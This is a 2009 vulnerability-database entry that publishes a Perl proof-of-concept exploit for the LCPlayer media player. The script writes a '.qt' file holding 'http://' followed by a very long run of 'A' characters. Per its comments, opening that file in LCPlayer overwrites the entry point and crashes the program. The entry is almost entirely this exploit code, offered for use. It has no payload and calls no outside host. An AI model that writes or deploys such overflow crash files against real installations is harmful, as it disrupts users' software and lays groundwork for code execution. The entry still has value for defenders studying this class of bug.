Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:21298
HistoryFeb 05, 2009 - 12:00 a.m.

LCPlayer (.qt file) EOP change PoC (app crash)

2009-02-0500:00:00
vulners.com
3

#!/usr/bin/perl -w
#By DarkB0X
#HomePage : http://NullArea.Net
#contact : [email protected]
#after loading the file click on it in the program
#entry point will change and the app will crash

my $file = "dark.qt" ;
my $poc="http://"."A" x 0265487 ;
open(b0x, ">>$file") or die "Cannot open $file";
print b0x $poc;
close(b0x);
print "\n[+] done ! , $file created";